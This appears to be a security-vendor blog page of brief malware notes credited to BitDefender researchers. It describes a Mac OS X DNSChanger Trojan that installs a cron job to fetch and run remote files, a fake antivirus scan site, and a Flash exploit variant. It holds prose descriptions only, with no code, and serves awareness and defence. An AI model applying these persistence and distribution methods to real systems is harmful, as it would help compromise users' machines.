Normal
0
21
false
false
false
DE
X-NONE
X-NONE
MicrosoftInternetExplorer4
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:””;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:”Times New Roman”;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:”Times New Roman”;
mso-bidi-theme-font:minor-bidi;}
This is a Trojan downloader for Mac OS X. It usually
comes as a disk image for a keygenerator/crack for various applications or as a
video codec for online streaming. Once mounted, the image shows an install
package which contains several files. Three of these files are of interes: Archive.pax.gz (which contains two files: AdobeFlash,
Mozzilaplug.plugin), preinstall, preupgrade. “AdobeFlash”, “preinstall” and “preupgrade” are exactly the
same file (bash script).
Once executed the script drops a file
using the uudecode command. This file is another shell script which installs a
crontrab entry which looks for new files to download every 5 minutes on a
remote server. If a file is found and downloaded, it will be silently executed.
This file is detected by BitDefender as MAC.OSX.Trojan.DNSChanger.A and changes
the systems Domain Name Server address. As an effect, people who think they’re
browsing to www.google.co.uk will be directed to a bogus website of the attackers choice.
It is suspected that this Trojan has
the same source as the newer Trojan.Zlob (aka Trojan.DNSChanger) versions which
basically have the same effect on Microsoft Windows operating systems. More
information about this to come in the next few days.
Yet another attempt to fool unknowing users
into downloading and installing rogues antivirus software. With a new design,
they are pushing the same fake products after an “online scan” that detected
lots of malware on their computers. Nothing new on this territory from
technological point of view. Here are a couple of screenshots of the new design
however. Beware of these websites!
What this version brings with it are just
new methods of obfuscation in order to avoid AV detection. It is a weaker
variant of Trojan.Exploit.SSX
meaning, it only tries to exploit browsers with vulnerable Flash Players. It is
using the deconcept Javascript classes library in order to detect the flash
version funning on the victims machine. After that it will server different SWF
Objects based on that, which will try to exploit the already known
vulnerability.
Information
in this article is available courtesy of BitDefender virus researchers: Daniel
Chipiristeanu, Daniel Radu
tags
November 14, 2024
September 06, 2024